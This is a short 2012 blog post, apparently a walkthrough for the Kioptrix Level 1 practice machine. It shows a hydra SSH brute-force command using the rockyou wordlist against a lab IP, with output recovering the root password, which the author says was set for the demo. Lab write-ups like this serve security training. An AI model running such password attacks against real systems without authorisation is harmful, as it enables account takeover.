Sunday, 12 August 2012
Kioptrix Hacking challenge LEVEL 1 part 3 (SSH)
Hi folks, ok, another option that we have to break into kioptix level 1, is bruteforce ssh, its quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack down via bruteforce.
In your backtrack type:
hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-08 13:33:19
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task
[DATA] attacking service ssh on port 22
[ssh] host: 172.16.1.144 login: root password: 123456
[STATUS] attack finished for 172.16.1.144 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-08 13:33:36
As you can see, it found the pasword 123456 for the user root.
PS : I changed the root password to 123456 for this demonstration only.